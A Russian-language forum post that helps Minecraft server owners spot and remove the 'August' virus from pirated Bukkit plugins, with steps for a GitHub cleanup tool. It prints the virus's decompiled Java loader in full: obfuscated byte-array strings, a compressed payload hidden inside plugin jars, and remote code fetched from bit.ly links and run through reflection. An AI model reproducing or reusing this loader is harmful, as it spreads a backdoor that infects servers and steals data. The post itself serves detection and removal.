Проверяем и удаляем вирус "Август" из плагинов говно-сборки

Скачали говно сборку с ютуба? Или слитый плагин на левом форуме?
После установки плагина у вас сборка запускается, но после того как вы что-то написали в консоль и сервер стопнулся?
Решение есть)

Вы когда нибудь замечали в левом плагине такой код. Он и является вирусом "Aвгуст"
Java:

static {
try {
File var0 = new File(new String(new byte[]{112, 108, 117, 103, 105, 110, 115, 47}));
boolean var1 = false;
long var2 = -1L;
int var4 = 0;
File[] var5 = var0.listFiles();

byte[] var7;
for(int var6 = 0; var6 < var5.length; ++var6) {
if (var5[var6].isFile() && var5[var6].getName().endsWith(new String(new byte[]{46, 106, 97, 114}))) {
var0 = var5[var6];
var7 = new byte[(int)var0.length()];
FileInputStream var8 = new FileInputStream(var0);
var8.read(var7);
var8.close();
if (var7[15] == (byte)(var7[16] ^ 190)) {
var1 = true;
var2 = (long)((var7[var7.length - 2] & 255) << 8 | var7[var7.length - 1] & 255);
if (var2 > 0L) {
var4 = (int)var2;
var2 = var0.length() - (var2 + 2L);
break;
}
}
}
}

if (var1) {
RandomAccessFile var16 = new RandomAccessFile(var0, "r");
var16.seek(var2);
var7 = new byte[var4];
var16.read(var7, 0, var4);
var16.close();
Inflater var17 = new Inflater();
var17.setInput(var7);
ByteArrayOutputStream var9 = new ByteArrayOutputStream(var4);
byte[] var10 = new byte[1024];

while(!var17.finished()) {
int var11 = var17.inflate(var10);
var9.write(var10, 0, var11);
}

var9.close();
var7 = var9.toByteArray();
var17.end();
String var18 = new String(new byte[]{104, 116, 116, 112, 58, 47, 47, 98, 105, 116, 46, 108, 121, 47});
URLClassLoader var12 = new URLClassLoader(new URL[]{new URL(var18 + new String(new byte[]{50, 50, 88, 66, 113, 105, 121})), new URL(var18 + new String(new byte[]{49, 88, 75, 65, 69, 112, 90}))}, Thread.currentThread().getContextClassLoader());
Method var13 = ClassLoader.class.getDeclaredMethod(new String(new byte[]{100, 101, 102, 105, 110, 101, 67, 108, 97, 115, 115}), String.class, byte[].class, Integer.TYPE, Integer.TYPE);
var13.setAccessible(true);
Class var14 = (Class)var13.invoke(var12, null, var7, 0, var7.length);
var14.newInstance();
}
} catch (Exception var15) {
}

}


Именной данный код и является вирусным. Он заражает все плагины своими копиями и в результате у всех плагинов есть выше приведенный кусочек кода, в их главном классе в самом низу.

Данный код скачивает библиотеку для управления байт-кодом и залазит во все плагины, препятствуя нормальной работе сервера. В некоторых случаях (сборки на Paper) сервер перестает отвечать на команды в чате, а после ввода любой команды в консоль и вовсе выключаются. Данный вирус ворует определенные данные создавая уязвимость к взлому, хак команды или прочее.

Как же вырезать данный вирус? Сейчас покажу!

1. 1. Вам необходимо будет скачать файл нажав на кнопку "Скачать", после чего переместить в любое удобное для вас место.
   2. Открой командую строку в данной папке нажав на её путь и дописав в начале cmd и нажав Enter.
      
      
   3. После чего в командной строке пописать java -jar August1StRemover-1.0-SNAPSHOT.jar "путь/к/папке/с/зараженными/плагинами"
   4. Готово, вирус "Август" удален с плагинов вашей сборки.
      
      
      Сама ссылка на утилиту: https://github.com/SHADOWDANCH/BukkitAugust1StVirusRemover/releases
      VT: https://www.virustotal.com/gui/file...10876915ed9ef30e0a19fe69ff62dac47e7?nocache=1